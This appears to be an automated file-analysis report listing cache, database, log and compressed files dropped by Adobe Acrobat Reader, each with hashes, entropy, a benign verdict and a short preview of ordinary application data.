                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):289
                                                  Entropy (8bit):5.317759484502527
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:082285982DBBA1BA07635E33FEA861E0
                                                  SHA1:78FF3330E8C82A4385BD9595A5D620F3471EBE47
                                                  SHA-256:A227A58BBB78813A7368029A174743F84262A0C7A6B725446DB069208F077CBA
                                                  SHA-512:5B2515C1EAFD423F9BF47ED9233DB06A458A46036CAB4D5BEDCE7B7E669BC591A9D70625937E049DFAF7A769F78820E5950D0456797A54F7F40A5AC6B8609B61
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):292
                                                  Entropy (8bit):5.320211078202062
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B03E732FF4F73BE71034635EE2915D7C
                                                  SHA1:F1E1116072F16D404E4CFB8B09C83E860E33616D
                                                  SHA-256:4AC0E3DBA617F34BAF429C570A8D306BED54B76DA0C0F377A134673CEE267EDF
                                                  SHA-512:45B4B3FAE0F7C8AFD071FC298162CA4B6E8B1381FC240223BA45D5DC2A345A9F0CA70CE6C5AB75820310518772F7A668C235646C9F5BD58D5B036B9C1097527D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):289
                                                  Entropy (8bit):5.327481983081215
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DFD6E1B573CE888AA99ECBDB5E41CC04
                                                  SHA1:38A6DEFA67DF4AF9589337B8206316AC2C9326CD
                                                  SHA-256:3EF6C7160B4A6DB8053ACAE3CDA494A37EFEBC8BD2FD8F3F52DFB07D92A456AF
                                                  SHA-512:6A4D0A74A9E3C4AED97C84FB42ABF7F35AC628E5EA4D2531745B9D865701BA4A6B7B3F437028E42F2C1355E098A1C8510F37AD72905B8AAD6CF1A605B54B1A5A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):295
                                                  Entropy (8bit):5.344722882784509
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:854FFB6F5438C3ABBF32974F7C0A7B84
                                                  SHA1:2B217BB70E036629C838DD0159286144ADE0FB46
                                                  SHA-256:86D7E529ABB17B4D82E89D8BCED3584D32FC940C1D1F8B29A253F446C76C7995
                                                  SHA-512:69717A42E5B815A9048AA73EDB2C31252E605AC671459AFBA4F9B8D2CB89875627203F89E65351D791BC383B97E6A9C837F6C864641740EF975DF6FB26AD5299
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):289
                                                  Entropy (8bit):5.3255992973497035
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8724CFAA9E8D419CF1FC747594BCEEB9
                                                  SHA1:B546D1D2C3C1FDE66450B7FDC59784B1E3947E9E
                                                  SHA-256:68540671BFAC966FCEC886D49A3D1EC077DB06CB29FC6A79EC078A96923814E7
                                                  SHA-512:469A943E85C919C6A9B1519EBCE13E9F88D3D90FDCEE38215F6C615BDD4E7A3C20FE0F9F21E0E45563D2B6CBD20ECF8D57B8A312319A534020C861E74A66F2EC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):284
                                                  Entropy (8bit):5.312100362027325
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E08D719D412A9EC55977A88252548B9A
                                                  SHA1:D5443C252E4836EDC6EA1F1B805200B56A072BD2
                                                  SHA-256:F5F8CC63D7FB63D4EFE8F400066F3C2AFB646BA2C030CC2880F9E6273A8A929B
                                                  SHA-512:3917BB04C4F68349BEB39942FB2CAD0FF3E9C6EA58BF2CC0394222CC77A174A8D87DAE7E436C24350C17D12BA2DB1F46EA516D6E5D952AC34E0C9A4203F6B4B8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):291
                                                  Entropy (8bit):5.308970454835595
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6BA17F3F93D38BF0F0F90FBFC8968AD4
                                                  SHA1:B97D55BB4E5B9C1EAD4B689BED9EF4B51B42308F
                                                  SHA-256:94C147EEDC27B0C60766A8C27ABF557D22046665820DFF223D78F5C4AB453CE4
                                                  SHA-512:12CD2AB464D4567578A33F093AFCBDD5AF1FA4C25E18717D8B026FCF7C0FA662EC80B5D90252B6D7526544430DBB2BCD99CA5E749E879CB8E862DD2EB2123BF1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):287
                                                  Entropy (8bit):5.312391727042076
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C3E9C2F99FD21B9003709D522029D3A0
                                                  SHA1:1FDE906F734271136DBC8D4EEE3EB06FE76CFEAD
                                                  SHA-256:EE444FC0FFAD43725957B90675CF59A79D703F134C07FFC1BA6FBB46B8D23CE4
                                                  SHA-512:3C9FA90B47877AE81A330F153948E608AA6756E669485FCB5939A4C29EAD9E1415E94CDA4458A39A2A24B8056FD6F4CF8075625272226E802E634AA67004BD03
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1090
                                                  Entropy (8bit):5.660869552857634
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2CEEEC6D292B9E768FB4CD4981BC927B
                                                  SHA1:4D91AAE25F404D223676206A8A32FDD46933A093
                                                  SHA-256:030DDAF910C3DDD50C09437A493B9484F03FD70119E8CA5DFB5F0B945B40F675
                                                  SHA-512:15A1BEECDDF0E6B46823C71BCDAD4DD1F68A7C8AADEF1CC931A201E9564F6931B4AF4B045532334A92F834345B0A3755EEB0CDDDAB2E57FD6DD447B0280BE21A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):286
                                                  Entropy (8bit):5.287291576758542
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E02847071DD4A54B1005EE51BC3896F9
                                                  SHA1:729A6378198E45F6064A59C5FA000D5AA710A7C0
                                                  SHA-256:563CE33C97C7A1C95D4F31E354219E8D7904ACE653BF348704A635A148EFFCC4
                                                  SHA-512:87DCD49C2E0ED0444BD53ACD56651CD90103D53B66AC137D14984B2F30F86952F45BC103A36CD85ACA46BF7D2D8F388EB411498D2D3A72E1B8EC4D26535781D5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):5.30130721784867
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:31E2C6177B8F97A5A738FAFB9FCCD766
                                                  SHA1:9AC2608E21BBFCEF4DC8ACCD84BC9E251AB23608
                                                  SHA-256:0AE77E8B55323A807B02C2CE213D9BF7D1321176F80395017D0C6082DE2B634E
                                                  SHA-512:34BAC428A4553BAC84856FE172F8E3B0B99A74F06176F21545366AB62FE6280E249B94593C78DB5EC3A6A3F8686FFE0F0767E665642F0437BAC1AB5BED233D0E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):0.8112781244591328
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2814
                                                  Entropy (8bit):5.142986131702443
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D5C55525754479F42F2B0CF76025F334
                                                  SHA1:9F2A5B8B044962A2A82FEA0C501944AF9BDD37EC
                                                  SHA-256:8F913BF09A8F690F16069CCE7B4883CBE0A33759F387039D3D88514010180DFC
                                                  SHA-512:17886EF8381051B430937861B89E6B95E0E2F8383DCD1E499E8B35488081036983B1705BE02C34DFEDF0D262E5B4B0C6B40FC12F0C2BED95F5538E34E6F61114
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"634276a8305e9015b3c669cea222e1da","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736538510000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b1f9843719c2782f86f54e740d98c9ce","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736538510000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"280eca6b1c3d34a764fcc4024f5f7a3b","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736538510000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"171cd2549722122d5187d0c70d3bfc3b","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736538509000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"29925fdfd09e28fbfd61aec1c032c19f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736538509000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"8aedbb23f5afdba4c1484cb34f2a1da8","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                  Category:dropped
                                                  Size (bytes):12288
                                                  Entropy (8bit):0.9884414896768501
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6BD9044434400B93C8A6533F9E3BA45C
                                                  SHA1:40A0A626F4699D85C30A0DBF8D4CD22DFE9BAADD
                                                  SHA-256:C987DDD8B25DB817312F3DDBB3EBB036B1582914A6533659D9C94E3E50A11EC0
                                                  SHA-512:D8D6234D2FE9B0372156BE9697CFFCD860D451CC25D180505B8139BBC61B330757AF125A6306F8955B52D741858E22070040E851C011A6825901C32A55F11DB3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):8720
                                                  Entropy (8bit):1.342948603996353
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E8374E965607D9C4C913B6C90C07FE7D
                                                  SHA1:5CB42853C50BC18CB50A1E385E9EA0B213A4D9E1
                                                  SHA-256:2760DF100DE9EEFF1E9897B414433F88CEB563AD9690DAA1A6519A5E2E4B8FAF
                                                  SHA-512:54AB857ABEAEE26A37F2C0BBD40A7D8EE1C4BB34A557BE225A2C32C56AE53A3C39FAA1E30936FC0B180230CBF0E27BDB6F476947E1BCECA0FA959A62CFB8C51E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.... .c.....K.7.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):66726
                                                  Entropy (8bit):5.392739213842091
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:99947732F95D731D3241B8B8C313BFA4
                                                  SHA1:6AA883F07EBBF9008CB9801A8B60E5C19EFEBCB0
                                                  SHA-256:07E353A33FB865E6CF10BB70E57F990F8BCC9ED7C61AB84CF96814EFF570FB59
                                                  SHA-512:B565C6F35CF3F859C026FC7BD9CC29B09BE0AD989DF63EC98C3B5A9AB8CD3D66302138F95AAABF4E52672034C80BECD0A01DF696250A1A1BD9FB0458EFAB92C8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):246
                                                  Entropy (8bit):3.529459928009153
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:52914B56709696528ECE8140C6F984CE
                                                  SHA1:F945EF289551C9D2ABC3BA8025A892495277CD02
                                                  SHA-256:80E1946A333D19EC9BF528DFF24B78E39284393CD114E7F3942578F732503FEC
                                                  SHA-512:A2F98123C1CCB0160985687C5309FA16342EB27DFFFDCE6DFB23612C9EDDC63D8C6FBE8239BF4C0B99477E55A5654450CEFEFFCEF5AF788528D8730E6B56125F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.0./.0.1./.2.0.2.5. . .1.4.:.4.8.:.3.3. .=.=.=.....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:ASCII text, with very long lines (393)
                                                  Category:dropped
                                                  Size (bytes):16525
                                                  Entropy (8bit):5.353642815103214
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:91F06491552FC977E9E8AF47786EE7C1
                                                  SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                  SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                  SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):29752
                                                  Entropy (8bit):5.417115704150546
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A321C2726FF74FF2BF523F19CD9E46D8
                                                  SHA1:7389561BCEF78C804893317D073416330A009901
                                                  SHA-256:E43EFEF4CF6D814A3DE83C3C4E52A175DE3C522CE8A0E8851F728F919E85C4C4
                                                  SHA-512:715C90C05390225563ADB6CA372871F7F76D69AA8E23C66B91A7450931683F511C7A5A09D3D532A5CFB64B72E5E398AFD0EC31AE1806FE3A0374109008DDA149
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                  Category:dropped
                                                  Size (bytes):758601
                                                  Entropy (8bit):7.98639316555857
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3A49135134665364308390AC398006F1
                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                  Category:dropped
                                                  Size (bytes):1407294
                                                  Entropy (8bit):7.97605879016224
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                                  SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                                  SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                                  SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                  Category:dropped
                                                  Size (bytes):1419751
                                                  Entropy (8bit):7.976496077007677
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AAAAB43627E96B02BC54A78F0EE8E32C
                                                  SHA1:03808205C51BA031BF69F0DF07C9C80835098104
                                                  SHA-256:B9ED5860C1528CAE5717E553381762D9C4ED093E546F7500F55B6B18B5C20CEA
                                                  SHA-512:A476038C2BC9573AFA12D831678C0D2A6EFF0C1E065F7D214A0D5684E79AA7F02710DF30524DE0E6EC90CB660E581531DFA57F038EE1BC285B9BC3DAE17D133D
                                                  Malicious:false
                                                  Reputation:unknown
